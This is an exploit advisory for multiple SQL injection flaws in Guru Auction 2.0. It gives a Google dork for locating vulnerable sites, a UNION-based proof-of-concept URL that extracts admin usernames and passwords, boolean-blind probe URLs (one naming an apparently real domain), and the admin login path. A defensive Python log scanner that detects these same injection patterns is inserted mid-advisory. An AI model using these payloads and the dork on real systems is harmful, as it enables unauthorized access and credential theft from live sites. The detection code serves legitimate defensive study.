Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
Author : v3n0m
Application : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=

SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--

Blind SQLi p0c:
~~~~~~~~~~
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
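As an added example that is not part of the advisory, the following Python scans web-server access-log lines for requests matching the two injection techniques shown above (UNION-based extraction via `cate_id` in subcat.php, boolean-based blind probing of `@@version` via `item_id` in detail.php). The log lines are constructed for this example; the `/shop/` path, IP address and timestamps are placeholders, not values from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines modelled on the advisory's PoC requests
# (Apache combined-style, shortened). Host path and client IP are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2010:10:00:01 +0000] "GET /shop/subcat.php?cate_id=12 HTTP/1.1" 200 5120
203.0.113.5 - - [01/Jan/2010:10:00:02 +0000] "GET /shop/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin-- HTTP/1.1" 200 640
203.0.113.5 - - [01/Jan/2010:10:00:03 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 8800
203.0.113.5 - - [01/Jan/2010:10:00:04 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 HTTP/1.1" 200 312
203.0.113.5 - - [01/Jan/2010:10:00:05 +0000] "GET /shop/detail.php?item_id=575 HTTP/1.1" 200 8800
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Script -> parameters the advisory identifies as injectable.
WATCHED = {"subcat.php": {"cate_id"}, "detail.php": {"item_id"}}

# Signatures for the two techniques in the advisory, applied to the decoded value
# (parse_qs already turns '+' into spaces and percent-decodes).
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)
BLIND_RE = re.compile(r"\b(and|or)\b.*\bsubstring\s*\(\s*@@version", re.I | re.S)


def classify_value(value):
    """Return 'union', 'blind', 'non-numeric', or None for a clean numeric ID."""
    if UNION_RE.search(value):
        return "union"
    if BLIND_RE.search(value):
        return "blind"
    # Both parameters are numeric IDs; anything else is worth a look.
    if not value.strip().isdigit():
        return "non-numeric"
    return None


def scan_log(text):
    """Return (script, parameter, classification) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1]
        params = parse_qs(url.query, keep_blank_values=True)
        for param in WATCHED.get(script, ()):
            for value in params.get(param, []):
                kind = classify_value(value)
                if kind:
                    hits.append((script, param, kind))
    return hits
```

Both blind requests are flagged even though one returned the normal page and one did not; the paired true/false pattern against the same ID is the signal, not the response size alone.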

Admin login entry:
~~~~~~~~~~
http://domain.tld/[path]/admin/